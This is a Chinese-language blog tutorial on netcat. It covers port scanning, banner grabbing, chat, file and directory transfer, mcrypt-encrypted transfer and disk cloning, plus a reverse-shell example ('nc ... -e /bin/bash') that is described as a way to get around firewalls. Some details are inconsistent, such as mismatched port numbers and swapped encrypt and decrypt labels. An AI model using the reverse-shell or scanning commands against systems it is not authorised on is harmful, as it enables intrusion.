Linux Netcat 命令 - 网络中的瑞士军刀

前言

netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。它的下载地址

netcat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
$ nc -h
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
[-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
[-x proxy_address[:port]] [hostname] [port[s]]
Command Summary:
-4 Use IPv4
-6 Use IPv6
-D Enable the debug socket option
-d Detach from stdin
-h This help text
-i secs Delay interval for lines sent, ports scanned
-k Keep inbound sockets open for multiple connects
-l Listen mode, for inbound connects
-n Suppress name/port resolutions
-p port Specify local port for remote connects
-r Randomize remote ports
-S Enable the TCP MD5 signature option
-s addr Local source address
-T ToS Set IP Type of Service
-C Send CRLF as line-ending
-t Answer TELNET negotiation
-U Use UNIX domain socket
-u UDP mode
-v Verbose
-w secs Timeout for connects and final net reads
-X proto Proxy protocol: "4", "5" (SOCKS) or "connect"
-x addr[:port] Specify proxy address and port
-z Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]

1
2
3
4
$ nc
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
[-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
[-x proxy_address[:port]] [hostname] [port[s]]

nc 的基本功能如下:

  • telnet / 获取系统 banner 信息
  • 传输文本信息
  • 传输文件和目录
  • 加密传输文件
  • 端口扫描
  • 远程控制 / 正方向 shell
  • 流媒体服务器
  • 远程克隆硬盘

使用例子

端口扫描

端口扫描经常被系统管理员和黑客用来发现在一些机器上开放的端口,帮助他们识别系统中的漏洞

1
$ nc -z -v -n 192.168.10.10 10-100

可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.

  • z 参数告诉netcat使用0 IO,连接成功后立即关闭连接, 不进行数据交换
  • v 参数指使用冗余选项(译者注:即详细输出)
  • n 参数告诉netcat 不要使用DNS反向查询IP地址的域名

这个命令会打印21到25 所有开放的端口。Banner是一个文本,Banner是一个你连接的服务发送给你的文本信息。当你试图鉴别漏洞或者服务的类型和版本的时候,Banner信息是非常有用的。但是,并不是所有的服务都会发送banner。

一旦你发现开放的端口,你可以容易的使用netcat 连接服务抓取他们的banner。

1
$ nc -v 192.168.10.10 22

netcat 命令会连接开放端口21并且打印运行在这个端口上服务的banner信息。

C S(Chat Server) 聊天

Server

1
$ nc -l 10010

netcat 命令在1567端口启动了一个tcp 服务器,所有的标准输出和输入会输出到该端口。输出和输入都在此shell中展示。

Client

1
$ nc 192.168.10.10 10010

不管你在机器B上键入什么都会出现在机器A上。

文件传输

大部分时间中,我们都在试图通过网络或者其他工具传输文件。有很多种方法,比如FTP,SCP,SMB等等,但是当你只是需要临时或者一次传输文件,真的值得浪费时间来安装配置一个软件到你的机器上嘛。假设,你想要传一个文件testfile.txt 从A 到B。A或者B都可以作为服务器或者客户端,以下,让A作为服务器,B为客户端。

Server

1
$ nc -l 10010 > testfile.txt

Client

1
$ nc -n 192.168.10.10 10010 < testfile.txt

这里我们创建了一个服务器在A上并且重定向netcat的输入为文件testfile.txt,那么当任何成功连接到该端口,netcat会发送file的文件内容。
在客户端我们重定向输出到testfile.txt,当B连接到A,A发送文件内容,B保存文件内容到testfile.txt.

没有必要创建文件源作为Server,我们也可以相反的方法使用。像下面的我们发送文件从B到A,但是服务器创建在A上,这次我们仅需要重定向netcat的输出并且重定向B的输入文件。

目录传输

发送一个文件很简单,但是如果我们想要发送多个文件,或者整个目录,一样很简单,只需要使用压缩工具tar,压缩后发送压缩包。

如果你想要通过网络传输一个目录从A到B。

Server

1
2
$ tar -cvf - dir_name | nc -n 192.168.10.10 10010
$ tar -cvf - dir_name | nc 192.168.10.10 10010

Client

1
$ nc -l 10010 | tar -xvf -

这里在A服务器上,我们创建一个tar归档包并且通过-在控制台重定向它,然后使用管道,重定向给netcat,netcat可以通过网络发送它。

在客户端我们下载该压缩包通过netcat 管道然后打开文件。

如果想要节省带宽传输压缩包,我们可以使用bzip2或者其他工具压缩。

Server

1
2
3
$ tar -cvf - dir_name| bzip2 -z | nc -n 192.168.10.10 10010
$ tar -cvf - dir_name| bzip2 -z | nc 192.168.10.10 10010
#使用 bzip2 压缩

Client

1
2
$ nc -l 10010 | bzip2 -d | tar -xvf -
#使用 bzip2 解压缩

加密通过网络发送的数据

如果你担心你在网络上发送数据的安全,你可以在发送你的数据之前用如 mcrypt 的工具加密。

Server

1
2
$ nc localhost 10010 | mcrypt -flush -bare -F -q -d -m ecb > testfile.txt
#使用mcrypt工具加密数据

Client

1
$ mcrypt -flush -bare -F -q -m ecb < testfile.txt | nc -l 10010

使用mcrypt工具解密数据。

以上两个命令会提示需要密码,确保两端使用相同的密码。

这里我们是使用mcrypt用来加密,使用其它任意加密工具都可以。

反向 SHELL

反向shell是指在客户端打开的shell。反向shell这样命名是因为不同于其他配置,这里服务器使用的是由客户提供的服务。

Server

1
$ nc -l 10010

在客户端,简单地告诉netcat在连接完成后,执行shell

Client

1
$ nc 192.168.10.10 10010 -e /bin/bash

现在,什么是反向shell的特别之处呢

反向shell经常被用来绕过防火墙的限制,如阻止入站连接。例如,我有一个专用IP地址为192.168.10.10,我使用代理服务器连接到外部网络。如果我想从网络外部访问 这台机器如10.1.1.10的shell,那么我会用反向外壳用于这一目的。

克隆设备

如果你已经安装配置一台Linux机器并且需要重复同样的操作对其他的机器,而你不想在重复配置一遍。不在需要重复配置安装的过程,只启动另一台机器的一些引导可以随身碟和克隆你的机器。

克隆Linux PC很简单,假如你的系统在磁盘/dev/sda上

Server

1
$ dd if=/dev/sda | nc -l 10010

在客户端,简单地告诉netcat在连接完成后,执行shell

Client

1
$ nc -n 192.168.10.10 10010 | dd of=/dev/sda

dd是一个从磁盘读取原始数据的工具,我通过netcat服务器重定向它的输出流到其他机器并且写入到磁盘中,它会随着分区表拷贝所有的信息。但是如果我们已经做过分区并且只需要克隆root分区,我们可以根据我们系统root分区的位置,更改sda 为sda1,sda2.等等。

-------------本文结束感谢您的阅读-------------

本文标题:Linux Netcat 命令 - 网络中的瑞士军刀

文章作者:Wang Jiemin

发布时间:2019年03月25日 - 09:03

最后更新:2019年04月18日 - 09:04

原始链接:https://jiemin.wang/2019/03/25/nc/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

0%